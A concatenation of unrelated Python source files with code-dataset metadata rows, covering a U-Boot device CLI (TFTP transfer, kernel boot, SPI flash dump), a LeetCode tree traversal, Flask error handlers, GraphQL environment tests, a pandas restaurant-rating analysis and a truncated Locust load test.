action.add_arguments(action_parser)
action_parser.set_defaults(action=action._run)
# -------------------------------------------------------------------------------------------------
class printenv(Action):
""" Print U-Boot environment variables
"""
def run(self, args):
result = self.client.printenv()
print("\n".join(result))
# -------------------------------------------------------------------------------------------------
class ping(Action):
""" Configure network on device and ping host
"""
def run(self, args):
self.configure_network()
result = self.client.ping(self.host_ip)[-1]
if not result.endswith("is alive"):
raise RuntimeError("network is unavailable")
print("Network is fine")
# -------------------------------------------------------------------------------------------------
class download(Action):
""" Download data from device's RAM via TFTP
"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--dst", type=str, default="./dump", help="Destination file")
parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Address to start downloading from")
parser.add_argument("--size", type=utils.hsize2int, required=True, help="Amount of bytes to be downloaded")
def run(self, args):
self.configure_network()
utils.download_files_via_tftp(self.client, (
(args.dst, args.addr, args.size),
), listen_ip=str(self.host_ip))
# -------------------------------------------------------------------------------------------------
class upload(Action):
""" Upload data to device's RAM via TFTP
"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--src", type=str, required=True, help="File to be uploaded")
parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Destination address in device's memory")
def run(self, args):
self.configure_network()
self.upload_files((args.src, args.addr))
# -------------------------------------------------------------------------------------------------
class boot(Action):
""" Upload Kernel and RootFS images into device's RAM and boot it
"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--uimage", type=str, required=True, help="Kernel UImage file")
parser.add_argument("--rootfs", type=str, required=True, help="RootFS image file")
parser.add_argument("--upload-addr", type=utils.hsize2int,
help="Start address to upload into")
parser.add_argument("--initrd-size", type=utils.hsize2int,
help="Amount of RAM for initrd (actual size of RootFS image file by default)")
parser.add_argument("--no-wait", action="store_true",
help="Don't wait end of serial output and exit immediately after sending 'bootm' command")
parser.add_argument("--ymodem", action="store_true",
help="Upload via serial (ymodem protocol)")
bootargs_group = parser.add_argument_group("bootargs", "Kernel's boot arguments")
bootargs_group.add_argument("--bootargs-ip", metavar="IP", type=str,
help="Literal value for `ip=` parameter")
bootargs_group.add_argument("--bootargs-ip-gw", metavar="IP",type=str,
help="Value for <gw-ip> of `ip=` parameter")
bootargs_group.add_argument("--bootargs-ip-hostname", metavar="HOSTNAME", type=str,
help="Value for <hostname> of `ip=` parameter")
bootargs_group.add_argument("--bootargs-ip-dns1", metavar="IP", type=str,
help="Value for <dns0-ip> of `ip=` parameter")
bootargs_group.add_argument("--bootargs-ip-dns2", metavar="IP", type=str,
help="Value for <dns1-ip> of `ip=` parameter")
def get_bootargs_ip(self, args):
if args.bootargs_ip is not None:
return args.bootargs_ip
fmt = "{client_ip}:{server_ip}:{gw_ip}:{netmask}:{hostname}:{device}:{autoconf}:{dns0_ip}:{dns1_ip}:{ntp0_ip}"
return fmt.format(
client_ip=self.device_ip,
server_ip=self.host_ip,
gw_ip=args.bootargs_ip_gw or self.host_ip,
netmask=self.host_netmask,
hostname=args.bootargs_ip_hostname or "camera1",
device="",
autoconf="off",
dns0_ip=args.bootargs_ip_dns1 or self.host_ip,
dns1_ip=args.bootargs_ip_dns2 or "",
ntp0_ip=""
)
def run(self, args):
uimage_size = os.path.getsize(args.uimage)
rootfs_size = os.path.getsize(args.rootfs) if args.initrd_size is None else args.initrd_size
alignment = self.config["mem"]["alignment"]
if args.upload_addr is None:
mem_end_addr = self.config["mem"]["start_addr"] + self.config["mem"]["linux_size"]
rootfs_addr = utils.align_address_down(alignment, mem_end_addr - rootfs_size)
uimage_addr = utils.align_address_down(alignment, rootfs_addr - uimage_size)
else:
uimage_addr = utils.align_address_up(alignment, args.upload_addr) # to ensure alignment
rootfs_addr = utils.align_address_up(alignment, uimage_addr + uimage_size)
logging.info("Kernel uImage upload addr {:#x}; RootFS image upload addr {:#x}".format(
uimage_addr, rootfs_addr
))
if args.ymodem:
self.upload_y_files((args.uimage, uimage_addr), (args.rootfs, rootfs_addr))
else:
self.configure_network()
self.upload_files((args.uimage, uimage_addr), (args.rootfs, rootfs_addr))
bootargs = ""
bootargs += "mem={} ".format(self.config["mem"]["linux_size"])
bootargs += "console={} ".format(self.config["linux_console"])
bootargs += "ip=" + self.get_bootargs_ip(args) + " "
bootargs += "mtdparts=hi_sfc:512k(boot) "
bootargs += "root=/dev/ram0 ro initrd={:#x},{}".format(rootfs_addr, rootfs_size)
logging.info("Load kernel with bootargs: {}".format(bootargs))
self.client.setenv(bootargs=bootargs)
resp = self.client.bootm(uimage_addr, wait=(not args.no_wait))
if resp is None:
print("'bootm' command has been sent. Hopefully booting is going on well...")
else:
print(
"Output ended with next lines:\n" +
"... {} lines above\n".format(len(resp)) +
"----------------------------------------\n" +
"\n".join(" {}".format(l.strip()) for l in resp[-10:]) +
"\n----------------------------------------"
)
# -------------------------------------------------------------------------------------------------
class download_sf(Action):
""" Download data from device's SPI flasg via TFTP
"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--probe", type=str, required=True, help="'sf probe' arguments")
parser.add_argument("--size", type=utils.hsize2int, required=True, help="Amount of bytes to be downloaded")
parser.add_argument("--offset", type=utils.hsize2int, default=0, help="Flash offset")
parser.add_argument("--dst", type=str, default="./dump.bin", help="Destination file")
parser.add_argument("--addr", type=utils.hsize2int, help="Devices's RAM address read data from flash into")
def run(self, args):
DEFAULT_MEM_ADDR = self.config["mem"]["start_addr"] + (1 << 20) # 1Mb
self.configure_network()
self.client.sf_probe(args.probe)
mem_addr = DEFAULT_MEM_ADDR if args.addr is None else args.addr
logging.info("Read {} bytes from {} offset of SPI flash into memory at {}...".format(args.size, args.offset, mem_addr))
self.client.sf_read(mem_addr, args.offset, args.size)
utils.download_files_via_tftp(self.client, (
(args.dst, mem_addr, args.size),
), listen_ip=str(self.host_ip))
# -------------------------------------------------------------------------------------------------
class upload_y(Action):
""" Upload data to device's RAM via serial (ymodem)
"""
@classmethod
def add_arguments(cls, parser):
pass
# parser.add_argument("--src", type=str, required=True, help="File to be uploaded")
# parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Destination address in device's memory")
def run(self, args):
self.client.loady(b"bla bla bla!")
| 41.266932 | 127 | 0.577621 |
abb837a9e83e5c81cca4c68f2584b6bea603d190 | 955 | py | Python | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | 1 | 2022-03-23T01:33:42.000Z | 2022-03-23T01:33:42.000Z | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | null | null | null | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | 1 | 2020-07-24T03:32:30.000Z | 2020-07-24T03:32:30.000Z | """
中序遍历:DFS或者栈来实现。
leetcode No.94
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
# dfs 递归实现
def inorderTraversal(self, root: TreeNode) -> List[int]:
ans = []
def dfs(node):
if not node:
return node
dfs(node.left)
ans.append(node.val)
dfs(node.right)
dfs(root)
return ans
# dfs 栈实现(非递归)
def inorderTraversal_stack(root):
if not root:
return root
stack = []
ans = []
while len(stack)>0 or root:
# 先遍历完所有左子树
if root is not None:
stack.append(root)
root = root.left
# 左子树遍历完后,弹出父节点,遍历右子树
else:
root = stack.pop()
ans.append(root.val)
root = root.right
return ans
| 22.738095 | 60 | 0.517277 |
abba7040a0cfe0cf70bb295473073b731da5a2e6 | 412 | py | Python | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | from common.permissions import IsOwner
from rest_framework.permissions import IsAuthenticated
class IsHostAuthenticated(IsOwner):
def has_permission(self, request, view):
if IsAuthenticated(request, view):
host = request.user
# if host.is_auth is True:
# return True
# else:
# return False
else:
return False
| 25.75 | 54 | 0.604369 |
abbae38fd528e8e3b7d6157c4bab4dfdbdd77b68 | 602 | py | Python | PyObjCTest/test_nsnibloading.py | Khan/pyobjc-framework-Cocoa | f8b015ea2a72d8d78be6084fb12925c4785b8f1f | [
"MIT"
] | 132 | 2015-01-01T10:02:42.000Z | 2022-03-09T12:51:01.000Z | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsnibloading.py | mba811/music-player | 7998986b34cfda2244ef622adefb839331b81a81 | [
"BSD-2-Clause"
] | 6 | 2015-01-06T08:23:19.000Z | 2019-03-14T12:22:06.000Z | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsnibloading.py | mba811/music-player | 7998986b34cfda2244ef622adefb839331b81a81 | [
"BSD-2-Clause"
] | 27 | 2015-02-23T11:51:43.000Z | 2022-03-07T02:34:18.000Z | from AppKit import *
from PyObjCTools.TestSupport import *
class TestNSNibLoading (TestCase):
def testMethods(self):
self.assertResultIsBOOL(NSBundle.loadNibFile_externalNameTable_withZone_)
self.assertResultIsBOOL(NSBundle.loadNibNamed_owner_)
self.assertResultIsBOOL(NSBundle.loadNibFile_externalNameTable_withZone_)
@min_os_level('10.8')
def testMethods10_8(self):
self.assertResultIsBOOL(NSBundle.loadNibNamed_owner_topLevelObjects_)
self.assertArgIsOut(NSBundle.loadNibNamed_owner_topLevelObjects_, 2)
if __name__ == "__main__":
main()
| 31.684211 | 81 | 0.777409 |
abbb57cc94fe1363193069eeb5073e9570578f59 | 2,956 | py | Python | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | 2 | 2020-11-24T03:56:29.000Z | 2020-11-24T04:02:41.000Z | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | null | null | null | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | null | null | null | #-*- coding:utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif']=['SimHei']# 用于显示plt的中文标签
pd.set_option('display.max_columns', None)#显示所有列
pd.set_option('display.max_rows', None)#显示所有行
data = pd.read_csv('C:\User\dell\Desktop\大众点评\dazhong.csv',encoding='gbk')
#print(data.head())#显示数据前5行
#print(data.head().columns)#显示数据每一列属性(即列名称)
#print(data.head().shape)#显示数据形状
data_analysis = data.loc[:,['Type', 'ID', 'ReviewNum', 'Level',
'FlavorScore', 'EnvironmentScore', 'ServiceScore',
'ApplauseRate', 'PictureNum', 'ParkingNum']]#选取特定的列
#菜系种类
kind=data_analysis['Type'].value_counts().sort_values(ascending=False)
kind=pd.DataFrame(kind)
#print(kind)
#菜系和评分之间的关系
kind_score=data_analysis[['Type','Level']].groupby(data_analysis['Type']).mean()
print(kind_score)
#plt.figure()
#plt.bar(data_analysis['Type'],data_analysis['Level'])
#plt.show()
#评分分布情况
star_map = data_analysis['Level'].value_counts(ascending=True)
#print(star_map)
sizes=[3,85,170,445,1128,1293]
plt.figure()
plt.pie(star_map,
autopct='%3.2f%%', # 数值保留固定小数位
labels=['2','5','3','4.5','4','3.5'])
plt.legend()
plt.title('店家评分分布情况')
#plt.show()
#各种评分折线图
df_pf=data_analysis.groupby('Type')['FlavorScore', 'EnvironmentScore', 'ServiceScore'].mean()
df_pf.head()
fig=plt.figure(figsize=(16,6))
ax1=fig.add_subplot(111)
ax1.plot(df_pf.index,df_pf['FlavorScore'],label='FlavorScore')
ax1.plot(df_pf.index,df_pf['EnvironmentScore'],label='EnvironmentScore')
ax1.plot(df_pf.index,df_pf['ServiceScore'],label='ServiceScore')
ax1.set_ylim(0,10)
plt.title('菜系与口味,环境,服务得分分布')
plt.legend(loc='best')
plt.grid()
#plt.show()
#分析粤菜
data_yuecai = data_analysis.loc[0:721]
plt.figure()
plt.subplot(221)
plt.scatter(data_yuecai['Level'],data_yuecai['FlavorScore'],alpha=0.5,edgecolors='red')
plt.title('店家得分与口味得分')
plt.subplot(222)
plt.scatter(data_yuecai['Level'],data_yuecai['EnvironmentScore'],edgecolors='yellow')
plt.title('店家得分与环境得分')
plt.subplot(223)
plt.scatter(data_yuecai['Level'],data_yuecai['ServiceScore'],edgecolors='blue')
plt.title('店家得分与环境得分')
plt.subplot(224)
plt.stackplot(data_yuecai['Level'], data_yuecai['FlavorScore'],
data_yuecai['EnvironmentScore'],data_yuecai['ServiceScore'],
colors=['m','c','r','k'])
plt.legend()
plt.title('得分折叠图')
plt.show()
plt.figure()
sns.pairplot(data_yuecai,hue="Level",palette="husl") #hue 选择分类列#
plt.title('粤菜店家得分概况')
plt.show()
sns.heatmap(data_yuecai.corr())
plt.show()
sns.jointplot(data_yuecai['Level'], data_yuecai['FlavorScore'], kind='hex')
sns.jointplot(data_yuecai['Level'], data_yuecai['FlavorScore'], kind='kde')
sns.scatterplot(x=data_yuecai['ReviewNum'],y=data_yuecai['ApplauseRate'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['FlavorScore'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['EnvironmentScore'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['ServiceScore'])
plt.show()
| 34.776471 | 93 | 0.72429 |
abbc16642f88ae7f1504bc4fde9ba1c81bcb930e | 19,773 | py | Python | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 60 | 2018-09-26T15:46:00.000Z | 2021-10-10T02:37:14.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 1,706 | 2018-09-26T16:11:22.000Z | 2021-08-20T13:37:59.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | griffinmilsap/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 11 | 2019-03-14T13:23:51.000Z | 2022-01-25T01:29:16.000Z | import pytest
import graphene
from gtmcore.inventory.inventory import InventoryManager
from gtmcore.fixtures import ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV
from gtmcore.environment import ComponentManager
from gtmcore.environment.bundledapp import BundledAppManager
import gtmcore
from lmsrvlabbook.tests.fixtures import fixture_working_dir_env_repo_scoped, fixture_working_dir
class TestEnvironmentServiceQueries(object):
def test_get_environment_status(self, fixture_working_dir, snapshot):
"""Test getting the a LabBook's environment status"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook10", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook10") {
environment {
containerStatus
imageStatus
}
}
}
"""
snapshot.assert_match(fixture_working_dir[2].execute(query))
def test_get_base(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's base"""
# Create labbook
query = """
mutation myCreateLabbook($name: String!, $desc: String!, $repository: String!,
$base_id: String!, $revision: Int!) {
createLabbook(input: {name: $name, description: $desc,
repository: $repository,
baseId: $base_id, revision: $revision}) {
labbook {
id
name
description
}
}
}
"""
variables = {"name": "labbook-base-test", "desc": "my test 1",
"base_id": ENV_UNIT_TEST_BASE, "repository": ENV_UNIT_TEST_REPO,
"revision": ENV_UNIT_TEST_REV}
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query, variable_values=variables))
query = """
{
labbook(owner: "default", name: "labbook-base-test") {
name
description
environment {
base{
id
componentId
name
description
readme
tags
icon
osClass
osRelease
license
url
languages
developmentTools
dockerImageServer
dockerImageNamespace
dockerImageRepository
dockerImageTag
packageManagers
}
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_get_package_manager(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's package manager dependencies"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook4", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
# should be null
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
# Add a base image
cm = ComponentManager(lb)
pkgs = [{"manager": "pip", "package": "requests", "version": "1.3"},
{"manager": "pip", "package": "numpy", "version": "1.12"},
{"manager": "pip", "package": "gtmunit1", "version": "0.2.4"}]
cm.add_packages('pip', pkgs)
pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
{"manager": "conda3", "package": "nltk", "version": '3.2.5'}]
cm.add_packages('conda3', pkgs)
# Add one package without a version, which should cause an error in the API since version is required
pkgs = [{"manager": "apt", "package": "lxml", "version": "3.4"}]
cm.add_packages('apt', pkgs)
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies(first: 2, after: "MA==") {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
def test_get_package_manager_metadata(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's package manager dependencies"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook4meta", description="my first asdf")
query = """
{
labbook(owner: "default", name: "labbook4meta") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
description
docsUrl
latestVersion
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
# should be null
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
# Add a base image
cm = ComponentManager(lb)
pkgs = [{"manager": "pip", "package": "gtmunit3", "version": "5.0"},
{"manager": "pip", "package": "gtmunit2", "version": "12.2"},
{"manager": "pip", "package": "gtmunit1", "version": '0.2.1'}]
cm.add_packages('pip', pkgs)
pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
{"manager": "conda3", "package": "python-coveralls", "version": "2.5.0"}]
cm.add_packages('conda3', pkgs)
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
def test_package_query_with_errors(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook5"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1", version:"0.2.4"},
{manager: "pip", package: "gtmunit2", version:"100.00"},
{manager: "pip", package: "gtmunit3", version:""},
{manager: "pip", package: "asdfasdfasdf", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_with_errors_conda(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5conda", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook5conda"){
id
checkPackages(packageInput: [
{manager: "conda3", package: "cdutil", version:"8.1"},
{manager: "conda3", package: "nltk", version:"100.00"},
{manager: "conda3", package: "python-coveralls", version:""},
{manager: "conda3", package: "thisshouldtotallyfail", version:"1.0"},
{manager: "conda3", package: "notarealpackage", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_with_errors_apt(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5apt", description="my first labbook10000")
# Create Component Manager
cm = ComponentManager(lb)
# Add a component
cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
query = """
{
labbook(owner: "default", name: "labbook5apt"){
id
checkPackages(packageInput: [
{manager: "apt", package: "curl", version:"8.1"},
{manager: "apt", package: "notarealpackage", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook6", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook6"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1", version:"0.2.4"},
{manager: "pip", package: "gtmunit2", version:""}]){
id
manager
package
version
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_no_version(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook6noversion", description="my first labbook10000")
# Create Component Manager
cm = ComponentManager(lb)
cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1"},
{manager: "pip", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "apt", package: "curl"},
{manager: "apt", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "conda3", package: "nltk"},
{manager: "conda3", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_bundle_app_query(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for bundled app info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook-bundle", description="my first df")
query = """
{
labbook(owner: "default", name: "labbook-bundle"){
id
environment {
bundledApps{
id
appName
description
port
command
}
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
bam = BundledAppManager(lb)
bam.add_bundled_app(8050, 'dash 1', 'a demo dash app 1', 'python app1.py')
bam.add_bundled_app(9000, 'dash 2', 'a demo dash app 2', 'python app2.py')
bam.add_bundled_app(9001, 'dash 3', 'a demo dash app 3', 'python app3.py')
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_base_update_available(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test checking if the base is able to be updated"""
im = InventoryManager()
lb = im.create_labbook('default', 'default', 'labbook-base-test-update')
cm = ComponentManager(lb)
# Add an old base.
cm.add_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 1)
query = """
{
labbook(owner: "default", name: "labbook-base-test-update") {
name
description
environment {
base{
id
revision
}
baseLatestRevision
}
}
}
"""
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['base']['revision'] == 1
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
# We upgrade our base to the latest
cm.change_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 2)
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['base']['revision'] == 2
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
query = """
{
labbook(owner: "default", name: "labbook-base-test-update") {
name
environment {
baseLatestRevision
}
}
}
"""
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
| 39.546 | 111 | 0.427603 |
abc03851149e0e601af538d349c6fb66b255a6d7 | 1,705 | py | Python | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | 1 | 2022-02-24T08:39:26.000Z | 2022-02-24T08:39:26.000Z | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | null | null | null | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# noinspection PyUnresolvedReferences
from ..typing import ChunkType, TileableType, EntityType, OperandType
from .base import ExecutionError
from .entity import (
Entity,
EntityData,
ENTITY_TYPE,
Chunk,
ChunkData,
CHUNK_TYPE,
Tileable,
TileableData,
TILEABLE_TYPE,
Object,
ObjectData,
ObjectChunk,
ObjectChunkData,
OBJECT_TYPE,
OBJECT_CHUNK_TYPE,
FuseChunk,
FuseChunkData,
FUSE_CHUNK_TYPE,
OutputType,
register_output_types,
get_output_types,
register_fetch_class,
get_fetch_class,
get_tileable_types,
get_chunk_types,
HasShapeTileable,
HasShapeTileableData,
ExecutableTuple,
_ExecuteAndFetchMixin,
NotSupportTile,
register,
unregister,
tile,
recursive_tile,
)
# noinspection PyUnresolvedReferences
from .graph import (
DirectedGraph,
DAG,
GraphContainsCycleError,
TileableGraph,
ChunkGraph,
TileableGraphBuilder,
ChunkGraphBuilder,
TileContext,
TileStatus,
)
from .mode import enter_mode, is_build_mode, is_eager_mode, is_kernel_mode
| 25.073529 | 74 | 0.734311 |
abc3eecfb1dec304561dc28f93ae2435fd288309 | 379 | py | Python | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | from typing import List
class StatisticGenerator(object):
def __init__(self, column_names):
self.column_names = column_names
'''
Function which returns two arrays:
1. Statistic column names
2. Statistic column values for each column name
'''
def generate_statistic(self, data_set) -> (List[str], List[str]):
pass | 27.071429 | 69 | 0.643799 |
abc47a42e5800e9371627fb5c621e40ef15d6a3b | 741 | py | Python | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 2 | 2021-04-08T06:50:49.000Z | 2021-04-17T12:52:45.000Z | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 16 | 2021-04-12T08:21:49.000Z | 2021-05-18T07:21:38.000Z | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 1 | 2021-04-17T12:54:34.000Z | 2021-04-17T12:54:34.000Z |
from flask import render_template
from app import db
from app.errors import bp
@bp.app_errorhandler(400)
def not_found_error(error):
return render_template('errors/400.html'), 400
@bp.app_errorhandler(401)
def not_found_error(error):
return render_template('errors/401.html'), 401
@bp.app_errorhandler(403)
def not_found_error(error):
return render_template('errors/403.html'), 403
@bp.app_errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
@bp.app_errorhandler(409)
def not_found_error(error):
return render_template('errors/409.html'), 409
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('errors/500.html'), 500 | 24.7 | 50 | 0.766532 |
abc5a6e1c8eb95e21a2424169d41cb33a6c8f98e | 1,199 | py | Python | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | 6 | 2021-01-05T02:53:23.000Z | 2022-02-17T07:53:36.000Z | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | null | null | null | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | 1 | 2021-01-26T01:08:57.000Z | 2021-01-26T01:08:57.000Z | import random
import uuid
from locust import HttpUser, task, between
apiUrl = "/webhooks/rest/webhook" # Rasa Core REST API endpoint
# apiUrl = "/core/webhooks/rest/webhook" # Rasa X REST API endpoint
class RasaRestExplodeBrainUser(HttpUser):
wait_time = between(3, 10)
